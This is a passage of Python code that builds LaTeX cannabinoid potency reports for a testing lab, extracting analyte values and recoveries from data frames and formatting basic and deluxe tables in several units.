report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_g_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'mg_g',
'Basic')
temporary_table = self.create_single_basic_table(temporary_data, 'mg_g')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_percent_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'Percent',
'Deluxe')
temporary_table = self.create_single_deluxe_table(temporary_data, 'Percent')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_g_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports(temporary_data_frame,
'mg_g',
'Deluxe')
temporary_table = self.create_single_deluxe_table(temporary_data, 'mg_g')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_ml_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Basic',
'density')
temporary_table = self.create_single_basic_table_unit(temporary_data, 'density')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_mg_ml_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Deluxe',
'density')
temporary_table = self.create_single_deluxe_table_unit(temporary_data, 'density')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_unit_basic_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Basic',
'unit')
temporary_table = self.create_single_basic_table_unit(temporary_data, 'unit')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def generate_single_unit_deluxe_report(self, sample_id):
temporary_data_frame = self.sample_data.samples_data_frame[self.sample_data.samples_data_frame['sampleid']
== sample_id]
temporary_data = self.get_relevant_values_and_recoveries_for_single_reports_unit(temporary_data_frame,
'Deluxe',
'unit')
temporary_table = self.create_single_deluxe_table_unit(temporary_data, 'unit')
header = self.latex_header_and_sample_list_dictionary[sample_id[0:6]]
footer = self.generate_footer()
report = header + temporary_table + footer
self.finished_reports_dictionary[sample_id] = report
def get_standard_recovery_values(self, report_type):
temporary_data_frame = self.sample_data.best_recovery_qc_data_frame
ibu_recovery_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 1.0,
['percrecovery']].iloc[0]['percrecovery']
ibu_recovery_value = self.round_down_to_correct_decimal_point(ibu_recovery_value)
cbdv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 2.0,
['percrecovery']].iloc[0]['percrecovery']
cbdv_value = self.round_down_to_correct_decimal_point(cbdv_value)
cbdva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 3.0,
['percrecovery']].iloc[0]['percrecovery']
cbdva_value = self.round_down_to_correct_decimal_point(cbdva_value)
thcv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 4.0,
['percrecovery']].iloc[0]['percrecovery']
thcv_value = self.round_down_to_correct_decimal_point(thcv_value)
# cbgva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 5.0,
# ['percrecovery']].iloc[0]['percrecovery']
# cbgva_value = self.round_down_to_correct_decimal_point(cbgva_value)
cbd_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 6.0,
['percrecovery']].iloc[0]['percrecovery']
cbd_value = self.round_down_to_correct_decimal_point(cbd_value)
cbg_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 7.0,
['percrecovery']].iloc[0]['percrecovery']
cbg_value = self.round_down_to_correct_decimal_point(cbg_value)
cbda_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 8.0,
['percrecovery']].iloc[0]['percrecovery']
cbda_value = self.round_down_to_correct_decimal_point(cbda_value)
cbn_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 9.0,
['percrecovery']].iloc[0]['percrecovery']
cbn_value = self.round_down_to_correct_decimal_point(cbn_value)
cbga_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 10.0,
['percrecovery']].iloc[0]['percrecovery']
cbga_value = self.round_down_to_correct_decimal_point(cbga_value)
thcva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 11.0,
['percrecovery']].iloc[0]['percrecovery']
thcva_value = self.round_down_to_correct_decimal_point(thcva_value)
d9_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 12.0,
['percrecovery']].iloc[0]['percrecovery']
d9_thc_value = self.round_down_to_correct_decimal_point(d9_thc_value)
d8_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 13.0,
['percrecovery']].iloc[0]['percrecovery']
d8_thc_value = self.round_down_to_correct_decimal_point(d8_thc_value)
cbl_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 14.0,
['percrecovery']].iloc[0]['percrecovery']
cbl_value = self.round_down_to_correct_decimal_point(cbl_value)
cbc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 15.0,
['percrecovery']].iloc[0]['percrecovery']
cbc_value = self.round_down_to_correct_decimal_point(cbc_value)
cbna_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 16.0,
['percrecovery']].iloc[0]['percrecovery']
cbna_value = self.round_down_to_correct_decimal_point(cbna_value)
thca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 17.0,
['percrecovery']].iloc[0]['percrecovery']
thca_value = self.round_down_to_correct_decimal_point(thca_value)
cbla_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 18.0,
['percrecovery']].iloc[0]['percrecovery']
cbla_value = self.round_down_to_correct_decimal_point(cbla_value)
cbca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 19.0,
['percrecovery']].iloc[0]['percrecovery']
cbca_value = self.round_down_to_correct_decimal_point(cbca_value)
if report_type == 'Deluxe':
return [ibu_recovery_value, cbdv_value, cbdva_value, thcv_value, "N/A", cbd_value, cbg_value,
cbda_value, cbn_value, cbga_value, thcva_value, d9_thc_value, d8_thc_value, cbl_value, cbc_value,
cbna_value, thca_value, cbla_value, cbca_value]
else:
return [ibu_recovery_value, cbd_value, cbda_value, cbn_value, cbna_value, d9_thc_value, thca_value,
d8_thc_value]
def get_relevant_values_and_recoveries_for_single_reports(self, temporary_data_frame, sample_type, report_type):
if sample_type == 'Percent':
sample_column_type = 'percentage_concentration'
elif sample_type == 'mg_g':
sample_column_type = 'mg_g'
elif sample_type == 'mg_ml':
sample_column_type = 'mg_ml'
else:
sample_column_type = 'percentage_concentration'
ibu_recovery_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 1.0,
['percrecovery']].iloc[0]['percrecovery']
ibu_recovery_value = self.round_down_to_correct_decimal_point(ibu_recovery_value)
cbdv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 2.0,
[sample_column_type]].iloc[0][sample_column_type]
cbdv_value = self.round_down_to_correct_decimal_point(cbdv_value)
cbdva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 3.0,
[sample_column_type]].iloc[0][sample_column_type]
cbdva_value = self.round_down_to_correct_decimal_point(cbdva_value)
thcv_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 4.0,
[sample_column_type]].iloc[0][sample_column_type]
thcv_value = self.round_down_to_correct_decimal_point(thcv_value)
cbgva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 5.0,
[sample_column_type]].iloc[0][sample_column_type]
cbgva_value = self.round_down_to_correct_decimal_point(cbgva_value)
cbd_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 6.0,
[sample_column_type]].iloc[0][sample_column_type]
cbd_value = self.round_down_to_correct_decimal_point(cbd_value)
cbg_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 7.0,
[sample_column_type]].iloc[0][sample_column_type]
cbg_value = self.round_down_to_correct_decimal_point(cbg_value)
cbda_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 8.0,
[sample_column_type]].iloc[0][sample_column_type]
cbda_value = self.round_down_to_correct_decimal_point(cbda_value)
cbn_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 9.0,
[sample_column_type]].iloc[0][sample_column_type]
cbn_value = self.round_down_to_correct_decimal_point(cbn_value)
cbga_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 10.0,
[sample_column_type]].iloc[0][sample_column_type]
cbga_value = self.round_down_to_correct_decimal_point(cbga_value)
thcva_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 11.0,
[sample_column_type]].iloc[0][sample_column_type]
thcva_value = self.round_down_to_correct_decimal_point(thcva_value)
d9_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 12.0,
[sample_column_type]].iloc[0][sample_column_type]
d9_thc_value = self.round_down_to_correct_decimal_point(d9_thc_value)
d8_thc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 13.0,
[sample_column_type]].iloc[0][sample_column_type]
d8_thc_value = self.round_down_to_correct_decimal_point(d8_thc_value)
cbl_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 14.0,
[sample_column_type]].iloc[0][sample_column_type]
cbl_value = self.round_down_to_correct_decimal_point(cbl_value)
cbc_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 15.0,
[sample_column_type]].iloc[0][sample_column_type]
cbc_value = self.round_down_to_correct_decimal_point(cbc_value)
cbna_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 16.0,
[sample_column_type]].iloc[0][sample_column_type]
cbna_value = self.round_down_to_correct_decimal_point(cbna_value)
thca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 17.0,
[sample_column_type]].iloc[0][sample_column_type]
thca_value = self.round_down_to_correct_decimal_point(thca_value)
cbla_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 18.0,
[sample_column_type]].iloc[0][sample_column_type]
cbla_value = self.round_down_to_correct_decimal_point(cbla_value)
cbca_value = temporary_data_frame.loc[temporary_data_frame['id17'] == 19.0,
[sample_column_type]].iloc[0][sample_column_type]
cbca_value = self.round_down_to_correct_decimal_point(cbca_value)
if report_type == 'Deluxe':
return [ibu_recovery_value, cbdv_value, cbdva_value, thcv_value, cbgva_value, cbd_value, cbg_value,
cbda_value, cbn_value, cbga_value, thcva_value, d9_thc_value, d8_thc_value, cbl_value, cbc_value,
cbna_value, thca_value, cbla_value, cbca_value]
else:
return [ibu_recovery_value, cbd_value, cbda_value, cbn_value, cbna_value, d9_thc_value, thca_value,
d8_thc_value]
def get_relevant_values_and_recoveries_for_single_reports_unit(self, temporary_data_frame, report_type, unit_type):
    """Collect rounded analyte values (and the IBU recovery) for a single-sample unit report.

    temporary_data_frame -- pandas frame with one row per analyte, keyed by the
        'id17' column (1.0 = IBU recovery row, 2.0-19.0 = analyte rows).
    report_type -- 'Deluxe' returns all 18 analytes; anything else returns the
        basic panel (CBD, CBDA, CBN, CBNA, d9-THC, THCA, d8-THC).
    unit_type -- selects the two value columns read for each analyte:
        'unit' -> ('mg_g', 'mg_unit'); 'density' -> ('mg_ml',
        'percentage_concentration'); anything else -> percentage twice.

    Returns [recovery, [col1_value, col2_value], ...] with every value passed
    through round_down_to_correct_decimal_point.
    """
    if unit_type == 'unit':
        column_1, column_2 = 'mg_g', 'mg_unit'
    elif unit_type == 'density':
        column_1, column_2 = 'mg_ml', 'percentage_concentration'
    else:
        column_1 = column_2 = 'percentage_concentration'

    def _cell(analyte_id, column):
        # Single-row lookup by analyte id, rounded for report display.
        raw = temporary_data_frame.loc[temporary_data_frame['id17'] == analyte_id, [column]].iloc[0][column]
        return self.round_down_to_correct_decimal_point(raw)

    ibu_recovery_value = _cell(1.0, 'percrecovery')
    if report_type == 'Deluxe':
        # Full panel: analyte ids 2..19 in report order (CBDV, CBDVA, THCV,
        # CBGVA, CBD, CBG, CBDA, CBN, CBGA, THCVA, d9-THC, d8-THC, CBL, CBC,
        # CBNA, THCA, CBLA, CBCA).
        analyte_ids = range(2, 20)
    else:
        # Basic panel order: CBD, CBDA, CBN, CBNA, d9-THC, THCA, d8-THC.
        analyte_ids = (6, 8, 9, 16, 12, 17, 13)
    return [ibu_recovery_value] + [[_cell(float(i), column_1), _cell(float(i), column_2)]
                                   for i in analyte_ids]
def create_single_deluxe_table(self, data, sample_type):
    """Render the LaTeX potency table for a single-sample 'Deluxe' report.

    data -- list of pre-formatted value strings in deluxe analyte order
        (e.g. data[11] = delta-9 THC, data[16] = THCA); entries are inserted
        verbatim into the table cells.
    sample_type -- 'Percent', 'mg_g' or 'mg_ml'; any other value falls back
        to a percent column header.
    Returns the LaTeX source of the table as a string.
    """
    thc_total = self.create_total_line('regular', 'deluxe', 'THC', data)
    cbd_total = self.create_total_line('regular', 'deluxe', 'CBD', data)
    recov_data = self.get_standard_recovery_values('Deluxe')
    # Map the internal unit keyword onto its LaTeX column-header label.
    if sample_type == 'Percent':
        sample_type = r'\%'
    elif sample_type == 'mg_g':
        sample_type = 'mg/g'
    elif sample_type == 'mg_ml':
        sample_type = 'mg/mL'
    else:
        sample_type = r'\%'
    deluxe_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.490\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$\\
& (""" + sample_type + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$-THC & """ + data[11] + r""" & ND & """ + recov_data[11] + r"""& """ + self.loq_dictionary[11] + r"""\\
$\Delta^{9}$-THC Acid & """ + data[16] + r""" & ND & """ + recov_data[16] + r"""& """ + self.loq_dictionary[16] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total + r"""} & & &\\
\hline
\hline
$\Delta^{8}$THC & """ + data[12] + r""" & ND & """ + recov_data[12] + r"""& """ + self.loq_dictionary[12] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & N/A & N/A \\
\hline
Cannabichromene (CBC) & """ + data[14] + r""" & ND& """ + recov_data[14] + r"""& """ + self.loq_dictionary[14] + r"""\\
Cannabichromene Acid & """ + data[18] + r""" & ND & """ + recov_data[18] + r"""& """ + self.loq_dictionary[18] + r"""\\
\hline
Cannabidiol (CBD) &""" + data[5] + r""" & ND & """ + recov_data[5] + r"""& """ + self.loq_dictionary[5] + r"""\\
Cannabidiol Acid & """ + data[7] + r""" & ND & """ + recov_data[7] + r"""& """ + self.loq_dictionary[7] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total + r"""} & & &\\
\hline
\hline
Cannabigerol (CBG) & """ + data[6] + r""" & ND & """ + recov_data[6] + r"""& """ + self.loq_dictionary[6] + r"""\\
Cannabigerol Acid & """ + data[9] + r""" & ND & """ + recov_data[9] + r"""& """ + self.loq_dictionary[9] + r"""\\
\hline
Cannabicyclol (CBL) & """ + data[13] + r""" & ND & """ + recov_data[13] + r"""& """ + self.loq_dictionary[13] + r"""\\
Cannabicyclol Acid & """ + data[17] + r""" & ND & """ + recov_data[17] + r"""& """ + self.loq_dictionary[17] + r"""\\
\hline
Cannabidivarin (CBDV) & """ + data[1] + r""" & ND & """ + recov_data[1] + r"""& """ + self.loq_dictionary[1] + r"""\\
Cannabidivarin Acid & """ + data[2] + r""" & ND & """ + recov_data[2] + r"""&""" + self.loq_dictionary[2] + r"""\\
\hline
$\Delta^{9}$ THCV & """ + data[3] + r""" & ND& """ + recov_data[3] + r"""& """ + self.loq_dictionary[3] + r"""\\
$\Delta^{9}$ THCV Acid & """ + data[10] + r""" & ND & """ + recov_data[10] + r"""& """ + self.loq_dictionary[10] + r"""\\
\hline
Cannabinol (CBN) & """ + data[8] + r""" & ND & """ + recov_data[8] + r"""& """ + self.loq_dictionary[8] + r"""\\
Cannabinol Acid & """ + data[15] + r""" & ND & """ + recov_data[15] + r"""& """ + self.loq_dictionary[15] + r""" \\
\hline
Cannabigerivarin Acid & ND & ND & N/A & N/A \\
\hline
\hline
\textbf{Moisture} & 0.00 & & &\\
\hline
\hline
\end{tabular}
\end{table}
"""
    return deluxe_potency_table_string
def create_single_deluxe_table_unit(self, data, unit_type):
    """Render the two-column (value + per-unit value) deluxe potency table.

    data -- list whose entries are [value, unit_value] string pairs in deluxe
        analyte order, as produced by
        get_relevant_values_and_recoveries_for_single_reports_unit.
    unit_type -- 'unit' -> mg/g and mg/unit headers; 'density' -> mg/mL and
        percent; anything else -> percent for both columns.
    Returns the LaTeX source of the table as a string.
    """
    thc_total = self.create_total_line('unit', 'deluxe', 'THC', data)
    cbd_total = self.create_total_line('unit', 'deluxe', 'CBD', data)
    recov_data = self.get_standard_recovery_values('Deluxe')
    # Column-header labels for the two sample-value columns.
    if unit_type == 'unit':
        sample_type_1 = 'mg/g'
        sample_type_2 = 'mg/unit'
    elif unit_type == 'density':
        sample_type_1 = 'mg/mL'
        sample_type_2 = r'\%'
    else:
        sample_type_1 = r'\%'
        sample_type_2 = r'\%'
    deluxe_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$ \\
& (""" + sample_type_1 + r""") & (""" + sample_type_2 + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$-THC & """ + data[11][0] + r""" & """ + data[11][1] + r""" & ND & """ + recov_data[11] + r"""&""" + \
self.loq_dictionary[11] + r"""\\
$\Delta^{9}$-THC Acid & """ + data[16][0] + r""" & """ + data[16][1] + r""" & ND & """ + recov_data[
16] + r"""& """ + self.loq_dictionary[16] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total[0] + r"""} & \textbf{""" + thc_total[1] + r"""} & & &\\
\hline
\hline
$\Delta^{8}$THC & """ + data[12][0] + r""" & """ + data[12][1] + r""" & ND & """ + recov_data[12] + r"""& """ + \
self.loq_dictionary[12] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & ND & N/A & N/A\\
\hline
Cannabichromene (CBC) & """ + data[14][0] + r""" & """ + data[14][1] + r""" & ND & """ + recov_data[14] + r"""& """ + \
self.loq_dictionary[14] + r"""\\
Cannabichromene Acid & """ + data[18][0] + r""" & """ + data[18][1] + r""" & ND & """ + recov_data[18] + r"""& """ + \
self.loq_dictionary[18] + r"""\\
\hline
Cannabidiol (CBD) &""" + data[5][0] + r""" & """ + data[5][1] + r""" & ND & """ + recov_data[5] + r"""& """ + \
self.loq_dictionary[5] + r"""\\
Cannabidiol Acid & """ + data[7][0] + r""" & """ + data[7][1] + r""" & ND & """ + recov_data[7] + r"""& """ + \
self.loq_dictionary[7] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total[0] + r"""} & \textbf{""" + cbd_total[1] + r"""} & & &\\
\hline
\hline
Cannabigerol (CBG) & """ + data[6][0] + r""" & """ + data[6][1] + r""" & ND & """ + recov_data[6] + r"""& """ + \
self.loq_dictionary[6] + r"""\\
Cannabigerol Acid & """ + data[9][0] + r""" & """ + data[9][1] + r""" & ND & """ + recov_data[9] + r"""& """ + \
self.loq_dictionary[9] + r"""\\
\hline
Cannabicyclol (CBL) & """ + data[13][0] + r""" & """ + data[13][1] + r""" & ND & """ + recov_data[
13] + r"""& """ + self.loq_dictionary[13] + r"""\\
Cannabicyclol Acid & """ + data[17][0] + r""" & """ + data[17][1] + r""" & ND & """ + recov_data[17] + r"""& """ + \
self.loq_dictionary[17] + r"""\\
\hline
Cannabidivarin (CBDV) & """ + data[1][0] + r""" & """ + data[1][1] + r""" & ND & """ + recov_data[1] + r"""& """ + \
self.loq_dictionary[1] + r"""\\
Cannabidivarin Acid & """ + data[2][0] + r""" & """ + data[2][1] + r""" & ND & """ + recov_data[2] + r"""& """ + \
self.loq_dictionary[2] + r"""\\
\hline
$\Delta^{9}$ THCV & """ + data[3][0] + r""" & """ + data[3][1] + r""" & ND & """ + recov_data[3] + r"""& """ + \
self.loq_dictionary[3] + r"""\\
$\Delta^{9}$ THCV Acid & """ + data[10][0] + r""" & """ + data[10][1] + r""" & ND & """ + recov_data[
10] + r"""& """ + self.loq_dictionary[10] + r"""\\
\hline
Cannabinol (CBN) & """ + data[8][0] + r""" & """ + data[8][1] + r""" & ND & """ + recov_data[8] + r"""& """ + \
self.loq_dictionary[8] + r"""\\
Cannabinol Acid & """ + data[15][0] + r""" & """ + data[15][1] + r""" & ND & """ + recov_data[15] + r"""& """ + \
self.loq_dictionary[15] + r""" \\
\hline
Cannabigerivarin Acid & ND & ND & N/A & N/A \\
\hline
\hline
\textbf{Moisture} & 0.00 & & & \\
\hline
\hline
\end{tabular}
\end{table}
"""
    return deluxe_potency_table_string
def create_single_basic_table(self, data, sample_type):
    """Render the LaTeX potency table for a single-sample 'Basic' report.

    data -- list of pre-formatted value strings in basic analyte order
        (data[1]=CBD, data[2]=CBDA, data[3]=CBN, data[4]=CBNA,
        data[5]=d9-THC, data[6]=THCA, data[7]=d8-THC).
    sample_type -- 'Percent', 'mg_g' or 'mg_ml'; any other value falls back
        to a percent column header.
    Returns the LaTeX source of the table as a string.
    """
    thc_total = self.create_total_line('regular', 'basic', 'THC', data)
    cbd_total = self.create_total_line('regular', 'basic', 'CBD', data)
    recov_data = self.get_standard_recovery_values('Basic')
    # Map the internal unit keyword onto its LaTeX column-header label.
    if sample_type == 'Percent':
        sample_type = r'\%'
    elif sample_type == 'mg_g':
        sample_type = 'mg/g'
    elif sample_type == 'mg_ml':
        sample_type = 'mg/mL'
    else:
        sample_type = r'\%'
    basic_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.490\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$\\
& (""" + sample_type + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$-THC & """ + data[5] + r""" & ND & """ + recov_data[5] + r"""& """ + self.loq_dictionary[5] + r"""\\
$\Delta^{9}$-THC Acid & """ + data[6] + r""" & ND & """ + recov_data[6] + r"""& """ + self.loq_dictionary[6] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total + r"""} & & &\\
\hline
\hline
$\Delta^{8}$-THC & """ + data[7] + r""" & ND & """ + recov_data[7] + r"""& """ + self.loq_dictionary[7] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & N/A & N/A \\
\hline
Cannabidiol (CBD) &""" + data[1] + r""" & ND & """ + recov_data[1] + r"""& """ + self.loq_dictionary[1] + r"""\\
Cannabidiol Acid &""" + data[2] + r""" & ND & """ + recov_data[2] + r"""& """ + self.loq_dictionary[2] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total + r"""} & & &\\
\hline
\hline
Cannabinol (CBN) & """ + data[3] + r""" & ND & """ + recov_data[3] + r"""& """ + self.loq_dictionary[3] + r"""\\
Cannabinol Acid & """ + data[4] + r""" & ND & """ + recov_data[4] + r"""& """ + self.loq_dictionary[4] + r"""\\
\hline
\hline
\textbf{Moisture} & 0.00 & & &\\
\hline
\hline
\end{tabular}
\end{table}
"""
    return basic_potency_table_string
def create_single_basic_table_unit(self, data, unit_type):
    """Render the two-column (value + per-unit value) basic potency table.

    data -- list whose entries are [value, unit_value] string pairs in basic
        analyte order (see create_single_basic_table for the index map).
    unit_type -- 'unit' -> mg/g and mg/unit headers; 'density' -> mg/mL and
        percent; anything else -> percent for both columns.
    Returns the LaTeX source of the table as a string.
    """
    thc_total = self.create_total_line('unit', 'basic', 'THC', data)
    cbd_total = self.create_total_line('unit', 'basic', 'CBD', data)
    recov_data = self.get_standard_recovery_values('Basic')
    # Column-header labels for the two sample-value columns.
    if unit_type == 'unit':
        sample_type_1 = 'mg/g'
        sample_type_2 = 'mg/unit'
    elif unit_type == 'density':
        sample_type_1 = 'mg/mL'
        sample_type_2 = r'\%'
    else:
        sample_type_1 = r'\%'
        sample_type_2 = r'\%'
    basic_potency_table_string = r"""
\newline
\renewcommand{\arraystretch}{1.2}
\begin{table}[h!]\centering
\begin{tabular}{p{\dimexpr0.270\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.245\textwidth-2\tabcolsep-\arrayrulewidth\relax}|
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.1\textwidth-2\tabcolsep-\arrayrulewidth\relax}
p{\dimexpr0.07\textwidth-2\tabcolsep-\arrayrulewidth\relax}
}
\textbf{Cannabinoids} & \textbf{Sample 1} & \textbf{Sample 1} & \textbf{\small Blank} & \textbf{\small Recovery} & $\mathbf{\small S_{0}}$ \\
& (""" + sample_type_1 + r""") & (""" + sample_type_2 + r""") & (\%) & (\%) & (\%) \\
\hline
\hline
$\Delta^{9}$ THC & """ + data[5][0] + r""" & """ + data[5][1] + r""" & ND & """ + recov_data[5] + r"""& """ + \
self.loq_dictionary[5] + r"""\\
$\Delta^{9}$ THC Acid & """ + data[6][0] + r""" & """ + data[6][1] + r""" & ND & """ + recov_data[
6] + r"""& """ + self.loq_dictionary[6] + r"""\\
\hline
\hline
\textbf{Total THC*} & \textbf{""" + thc_total[0] + r"""} & \textbf{""" + thc_total[1] + r"""} & & &\\
\hline
\hline
$\Delta^{8}$ THC & """ + data[7][0] + r""" & """ + data[7][1] + r""" & ND & """ + recov_data[7] + r"""& """ + \
self.loq_dictionary[7] + r"""\\
$\Delta^{8}$THC Acid & ND & ND & ND & N/A & N/A \\
\hline
Cannabidiol (CBD) &""" + data[1][0] + r""" & """ + data[1][1] + r""" & ND & """ + recov_data[1] + r"""& """ + \
self.loq_dictionary[1] + r"""\\
Cannabidiol Acid &""" + data[2][0] + r""" & """ + data[2][1] + r""" & ND & """ + recov_data[2] + r"""& """ + \
self.loq_dictionary[2] + r"""\\
\hline
\hline
\textbf{Total CBD**} & \textbf{""" + cbd_total[0] + r"""} & \textbf{""" + cbd_total[1] + r"""} & & &\\
\hline
\hline
Cannabinol (CBN) & """ + data[3][0] + r""" & """ + data[3][1] + r""" & ND & """ + recov_data[3] + r"""& """ + \
self.loq_dictionary[3] + r"""\\
Cannabinol Acid & """ + data[4][0] + r""" & """ + data[4][1] + r""" & ND & """ + recov_data[4] + r"""& """ + \
self.loq_dictionary[4] + r"""\\
\hline
\hline
\textbf{Moisture} & 0.00 & & &\\
\hline
\hline
\end{tabular}
\end{table}
"""
    return basic_potency_table_string
def generate_footer(self):
    """Return the fixed LaTeX report footer.

    Contains the methods note, S0/MDL explanation, the Total THC / Total CBD
    formulas (acid x 0.877), sample-retention text, signature lines, the lab
    contact fancyfoot blocks, and the end-of-document marker.
    """
    footer_string = r"""
Methods: solvent extraction; measured by UPLC-UV, tandem MS, P.I. 1.14 \& based on USP monograph 29 \newline
$\si{S_{o}}$ = standard deviation at zero analyte concentration. MDL generally considered to be 3x $\si{S_{o}}$ value. \newline\newline
ND = none detected. N/A = not applicable. THC = tetrahydrocannabinol.\newline
\textbf{*Total THC} = $\Delta^{9}$-THC + (THCA x 0.877 ). \textbf{**Total CBD} = CBD + (CBDA x 0.877).\newline\newline
